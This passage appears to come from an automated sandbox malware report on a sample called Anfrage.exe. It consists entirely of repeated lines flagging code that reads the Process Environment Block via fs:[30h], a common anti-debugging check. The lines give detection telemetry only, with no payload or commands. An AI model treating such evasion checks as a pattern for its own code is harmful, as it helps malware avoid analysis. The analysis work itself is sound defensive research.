            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363DF720 mov eax, dword ptr fs:[00000030h] 7_2_363DF720
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363FF71F mov eax, dword ptr fs:[00000030h] 7_2_363FF71F
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363C5702 mov eax, dword ptr fs:[00000030h] 7_2_363C5702
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363C7703 mov eax, dword ptr fs:[00000030h] 7_2_363C7703
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363BB765 mov eax, dword ptr fs:[00000030h] 7_2_363BB765
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3648972B mov eax, dword ptr fs:[00000030h] 7_2_3648972B
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3647F72E mov eax, dword ptr fs:[00000030h] 7_2_3647F72E
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3649B73C mov eax, dword ptr fs:[00000030h] 7_2_3649B73C
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363D3740 mov eax, dword ptr fs:[00000030h] 7_2_363D3740
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363BF7BA mov eax, dword ptr fs:[00000030h] 7_2_363BF7BA
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363ED7B0 mov eax, dword ptr fs:[00000030h] 7_2_363ED7B0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3647F78A mov eax, dword ptr fs:[00000030h] 7_2_3647F78A
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363CD7E0 mov ecx, dword ptr fs:[00000030h] 7_2_363CD7E0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3644F7AF mov eax, dword ptr fs:[00000030h] 7_2_3644F7AF
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364497A9 mov eax, dword ptr fs:[00000030h] 7_2_364497A9
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3647D7B0 mov eax, dword ptr fs:[00000030h] 7_2_3647D7B0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363C57C0 mov eax, dword ptr fs:[00000030h] 7_2_363C57C0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364937B6 mov eax, dword ptr fs:[00000030h] 7_2_364937B6
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3647F453 mov eax, dword ptr fs:[00000030h] 7_2_3647F453
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3646B450 mov eax, dword ptr fs:[00000030h] 7_2_3646B450
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363E340D mov eax, dword ptr fs:[00000030h] 7_2_363E340D
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3649547F mov eax, dword ptr fs:[00000030h] 7_2_3649547F
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_36447410 mov eax, dword ptr fs:[00000030h] 7_2_36447410
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363C1460 mov eax, dword ptr fs:[00000030h] 7_2_363C1460
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363DF460 mov eax, dword ptr fs:[00000030h] 7_2_363DF460
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363CB440 mov eax, dword ptr fs:[00000030h] 7_2_363CB440
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363B74B0 mov eax, dword ptr fs:[00000030h] 7_2_363B74B0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363F34B0 mov eax, dword ptr fs:[00000030h] 7_2_363F34B0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364954DB mov eax, dword ptr fs:[00000030h] 7_2_364954DB
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364694E0 mov eax, dword ptr fs:[00000030h] 7_2_364694E0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363C9486 mov eax, dword ptr fs:[00000030h] 7_2_363C9486
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363BB480 mov eax, dword ptr fs:[00000030h] 7_2_363BB480
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364914F6 mov eax, dword ptr fs:[00000030h] 7_2_364914F6
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364674B0 mov eax, dword ptr fs:[00000030h] 7_2_364674B0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363CD534 mov eax, dword ptr fs:[00000030h] 7_2_363CD534
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363FD530 mov eax, dword ptr fs:[00000030h] 7_2_363FD530
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3646B550 mov eax, dword ptr fs:[00000030h] 7_2_3646B550
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363F7505 mov eax, dword ptr fs:[00000030h] 7_2_363F7505
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363F7505 mov ecx, dword ptr fs:[00000030h] 7_2_363F7505
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363FB570 mov eax, dword ptr fs:[00000030h] 7_2_363FB570
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363BB562 mov eax, dword ptr fs:[00000030h] 7_2_363BB562
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3646F525 mov eax, dword ptr fs:[00000030h] 7_2_3646F525
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3647B52F mov eax, dword ptr fs:[00000030h] 7_2_3647B52F
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_36495537 mov eax, dword ptr fs:[00000030h] 7_2_36495537
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364955C9 mov eax, dword ptr fs:[00000030h] 7_2_364955C9
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363EF5B0 mov eax, dword ptr fs:[00000030h] 7_2_363EF5B0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3643D5D0 mov eax, dword ptr fs:[00000030h] 7_2_3643D5D0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3643D5D0 mov ecx, dword ptr fs:[00000030h] 7_2_3643D5D0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363E15A9 mov eax, dword ptr fs:[00000030h] 7_2_363E15A9
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364935D7 mov eax, dword ptr fs:[00000030h] 7_2_364935D7
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363B758F mov eax, dword ptr fs:[00000030h] 7_2_363B758F
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363E15F4 mov eax, dword ptr fs:[00000030h] 7_2_363E15F4
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3644B594 mov eax, dword ptr fs:[00000030h] 7_2_3644B594
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363E95DA mov eax, dword ptr fs:[00000030h] 7_2_363E95DA
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3645D5B0 mov eax, dword ptr fs:[00000030h] 7_2_3645D5B0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3647F5BE mov eax, dword ptr fs:[00000030h] 7_2_3647F5BE
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364535BA mov eax, dword ptr fs:[00000030h] 7_2_364535BA
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363F55C0 mov eax, dword ptr fs:[00000030h] 7_2_363F55C0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364935B6 mov eax, dword ptr fs:[00000030h] 7_2_364935B6
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3647B256 mov eax, dword ptr fs:[00000030h] 7_2_3647B256
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3644D250 mov ecx, dword ptr fs:[00000030h] 7_2_3644D250
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648D26B mov eax, dword ptr fs:[00000030h]7_2_3648D26B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648D26B mov eax, dword ptr fs:[00000030h]7_2_3648D26B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36401270 mov eax, dword ptr fs:[00000030h]7_2_36401270
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36401270 mov eax, dword ptr fs:[00000030h]7_2_36401270
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F7208 mov eax, dword ptr fs:[00000030h]7_2_363F7208
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F7208 mov eax, dword ptr fs:[00000030h]7_2_363F7208
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E9274 mov eax, dword ptr fs:[00000030h]7_2_363E9274
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495227 mov eax, dword ptr fs:[00000030h]7_2_36495227
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F724D mov eax, dword ptr fs:[00000030h]7_2_363F724D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9240 mov eax, dword ptr fs:[00000030h]7_2_363B9240
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9240 mov eax, dword ptr fs:[00000030h]7_2_363B9240
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D52A0 mov eax, dword ptr fs:[00000030h]7_2_363D52A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D52A0 mov eax, dword ptr fs:[00000030h]7_2_363D52A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D52A0 mov eax, dword ptr fs:[00000030h]7_2_363D52A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D52A0 mov eax, dword ptr fs:[00000030h]7_2_363D52A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F329E mov eax, dword ptr fs:[00000030h]7_2_363F329E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F329E mov eax, dword ptr fs:[00000030h]7_2_363F329E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364952E2 mov eax, dword ptr fs:[00000030h]7_2_364952E2
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646B2F0 mov eax, dword ptr fs:[00000030h]7_2_3646B2F0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646B2F0 mov eax, dword ptr fs:[00000030h]7_2_3646B2F0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647F2F8 mov eax, dword ptr fs:[00000030h]7_2_3647F2F8
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B92FF mov eax, dword ptr fs:[00000030h]7_2_363B92FF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495283 mov eax, dword ptr fs:[00000030h]7_2_36495283
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364572A0 mov eax, dword ptr fs:[00000030h]7_2_364572A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364572A0 mov eax, dword ptr fs:[00000030h]7_2_364572A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB2D3 mov eax, dword ptr fs:[00000030h]7_2_363BB2D3
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB2D3 mov eax, dword ptr fs:[00000030h]7_2_363BB2D3
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB2D3 mov eax, dword ptr fs:[00000030h]7_2_363BB2D3
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF2D0 mov eax, dword ptr fs:[00000030h]7_2_363EF2D0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF2D0 mov eax, dword ptr fs:[00000030h]7_2_363EF2D0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364892A6 mov eax, dword ptr fs:[00000030h]7_2_364892A6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364892A6 mov eax, dword ptr fs:[00000030h]7_2_364892A6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364892A6 mov eax, dword ptr fs:[00000030h]7_2_364892A6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364892A6 mov eax, dword ptr fs:[00000030h]7_2_364892A6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364492BC mov eax, dword ptr fs:[00000030h]7_2_364492BC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364492BC mov eax, dword ptr fs:[00000030h]7_2_364492BC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364492BC mov ecx, dword ptr fs:[00000030h]7_2_364492BC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364492BC mov ecx, dword ptr fs:[00000030h]7_2_364492BC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C92C5 mov eax, dword ptr fs:[00000030h]7_2_363C92C5
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C92C5 mov eax, dword ptr fs:[00000030h]7_2_363C92C5
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C0 mov eax, dword ptr fs:[00000030h]7_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C0 mov eax, dword ptr fs:[00000030h]7_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C0 mov eax, dword ptr fs:[00000030h]7_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C0 mov eax, dword ptr fs:[00000030h]7_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C0 mov eax, dword ptr fs:[00000030h]7_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C0 mov eax, dword ptr fs:[00000030h]7_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C0 mov eax, dword ptr fs:[00000030h]7_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495341 mov eax, dword ptr fs:[00000030h]7_2_36495341
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B7330 mov eax, dword ptr fs:[00000030h]7_2_363B7330
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF32A mov eax, dword ptr fs:[00000030h]7_2_363EF32A
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647F367 mov eax, dword ptr fs:[00000030h]7_2_3647F367
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36463370 mov eax, dword ptr fs:[00000030h]7_2_36463370
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C7370 mov eax, dword ptr fs:[00000030h]7_2_363C7370
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C7370 mov eax, dword ptr fs:[00000030h]7_2_363C7370
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C7370 mov eax, dword ptr fs:[00000030h]7_2_363C7370
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644930B mov eax, dword ptr fs:[00000030h]7_2_3644930B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644930B mov eax, dword ptr fs:[00000030h]7_2_3644930B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644930B mov eax, dword ptr fs:[00000030h]7_2_3644930B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648132D mov eax, dword ptr fs:[00000030h]7_2_3648132D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648132D mov eax, dword ptr fs:[00000030h]7_2_3648132D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9353 mov eax, dword ptr fs:[00000030h]7_2_363B9353
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9353 mov eax, dword ptr fs:[00000030h]7_2_363B9353
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BD34C mov eax, dword ptr fs:[00000030h]7_2_363BD34C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BD34C mov eax, dword ptr fs:[00000030h]7_2_363BD34C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647B3D0 mov ecx, dword ptr fs:[00000030h]7_2_3647B3D0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E33A5 mov eax, dword ptr fs:[00000030h]7_2_363E33A5
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F33A0 mov eax, dword ptr fs:[00000030h]7_2_363F33A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F33A0 mov eax, dword ptr fs:[00000030h]7_2_363F33A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647F3E6 mov eax, dword ptr fs:[00000030h]7_2_3647F3E6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364953FC mov eax, dword ptr fs:[00000030h]7_2_364953FC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3649539D mov eax, dword ptr fs:[00000030h]7_2_3649539D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3641739A mov eax, dword ptr fs:[00000030h]7_2_3641739A
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3641739A mov eax, dword ptr fs:[00000030h]7_2_3641739A
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364613B9 mov eax, dword ptr fs:[00000030h]7_2_364613B9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364613B9 mov eax, dword ptr fs:[00000030h]7_2_364613B9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364613B9 mov eax, dword ptr fs:[00000030h]7_2_364613B9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646705E mov ebx, dword ptr fs:[00000030h]7_2_3646705E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646705E mov eax, dword ptr fs:[00000030h]7_2_3646705E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495060 mov eax, dword ptr fs:[00000030h]7_2_36495060
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644106E mov eax, dword ptr fs:[00000030h]7_2_3644106E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3643D070 mov ecx, dword ptr fs:[00000030h]7_2_3643D070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov ecx, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB052 mov eax, dword ptr fs:[00000030h]7_2_363EB052
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648903E mov eax, dword ptr fs:[00000030h]7_2_3648903E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648903E mov eax, dword ptr fs:[00000030h]7_2_3648903E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648903E mov eax, dword ptr fs:[00000030h]7_2_3648903E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648903E mov eax, dword ptr fs:[00000030h]7_2_3648903E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3643D0C0 mov eax, dword ptr fs:[00000030h]7_2_3643D0C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3643D0C0 mov eax, dword ptr fs:[00000030h]7_2_3643D0C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364950D9 mov eax, dword ptr fs:[00000030h]7_2_364950D9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F909C mov eax, dword ptr fs:[00000030h]7_2_363F909C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C5096 mov eax, dword ptr fs:[00000030h]7_2_363C5096
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363ED090 mov eax, dword ptr fs:[00000030h]7_2_363ED090
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363ED090 mov eax, dword ptr fs:[00000030h]7_2_363ED090
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BD08D mov eax, dword ptr fs:[00000030h]7_2_363BD08D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644D080 mov eax, dword ptr fs:[00000030h]7_2_3644D080
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644D080 mov eax, dword ptr fs:[00000030h]7_2_3644D080
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E50E4 mov eax, dword ptr fs:[00000030h]7_2_363E50E4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E50E4 mov ecx, dword ptr fs:[00000030h]7_2_363E50E4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E90DB mov eax, dword ptr fs:[00000030h]7_2_363E90DB
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov ecx, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov ecx, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov ecx, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov ecx, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C0 mov eax, dword ptr fs:[00000030h]7_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36453140 mov eax, dword ptr fs:[00000030h]7_2_36453140
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36453140 mov eax, dword ptr fs:[00000030h]7_2_36453140
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36453140 mov eax, dword ptr fs:[00000030h]7_2_36453140
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB136 mov eax, dword ptr fs:[00000030h]7_2_363BB136
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB136 mov eax, dword ptr fs:[00000030h]7_2_363BB136
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB136 mov eax, dword ptr fs:[00000030h]7_2_363BB136
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB136 mov eax, dword ptr fs:[00000030h]7_2_363BB136
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C1131 mov eax, dword ptr fs:[00000030h]7_2_363C1131
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C1131 mov eax, dword ptr fs:[00000030h]7_2_363C1131
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495152 mov eax, dword ptr fs:[00000030h]7_2_36495152
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36459179 mov eax, dword ptr fs:[00000030h]7_2_36459179
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF172 mov eax, dword ptr fs:[00000030h]7_2_363BF172
